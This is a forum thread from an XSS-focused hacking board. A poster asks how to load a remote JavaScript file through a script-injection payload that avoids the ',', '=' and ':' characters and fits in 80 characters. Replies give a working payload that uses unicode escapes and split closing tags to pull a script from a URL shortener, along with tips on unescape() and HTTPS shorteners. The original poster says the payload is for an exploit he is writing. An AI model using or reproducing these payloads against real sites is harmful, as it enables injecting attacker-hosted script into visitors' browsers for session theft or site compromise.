Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Loading a js in 80 chars without , = or :
Posted by: Neo139
Date: April 23, 2011 04:03AM

I have to load a js like <script src="http://something.com/a.js"></script>
but I can't use these three chars:

,
=
:

So this is the where I am now. 92 chars
<script>document.write("<script
src"+String.fromCharCode(61))</script>//qr.net/4ds></script>

When you use it in the code, the next html tag is </label>
so it ends like this
<script>document.write("<script
src"+String.fromCharCode(61))</script>//qr.net/4ds></script></label>

The next code, makes the http request of the js file but does not execute it (at least in FF3 and FF4)
<script>document.write("<script src"+String.fromCharCode(61))</script>//qr.net/4ds?
its a shame it doesn't work :(
any ideas? this one is hard :\

Options: ReplyQuote
Re: Loading a js in 80 chars without , = or :
Posted by: barbarianbob
Date: April 23, 2011 04:02PM

Your closing tag in the document.write is terminating the script tag early. Split it up into a concatenation:

<script>document.write("<script src\u003d'//qr.net/4ds'></scr"+"ipt>")</script>



Edited 1 time(s). Last edit at 04/23/2011 04:03PM by barbarianbob.

Options: ReplyQuote
Re: Loading a js in 80 chars without , = or :
Posted by: Neo139
Date: April 23, 2011 05:32PM

Thanks!!!!!!!!!!!!!!!
amazing
I will give you credit in the exploit I'm coding ^_^

It was 4am when I posted and I was so tired I posted in the Jobs subforums without knowing.Sorry

Also I found // is http:// only if you are in a webpage that is http://
if you are in https:// then // translate to https://
So now I need to find a url shortener that have https.

EDIT: bit.ly has SSL ^^



Edited 1 time(s). Last edit at 04/23/2011 06:21PM by Neo139.

Options: ReplyQuote
Re: Loading a js in 80 chars without , = or :
Posted by: Kyo
Date: April 26, 2011 09:05AM

you can also use unescape() if you're short on space and backslashes don't work

Options: ReplyQuote
Re: Loading a js in 80 chars without , = or :
Posted by: VMw4r3
Date: April 26, 2011 03:51PM

http://seclists.org/fulldisclosure/2011/Apr/393

Options: ReplyQuote


Sorry, only registered users may post in this forum.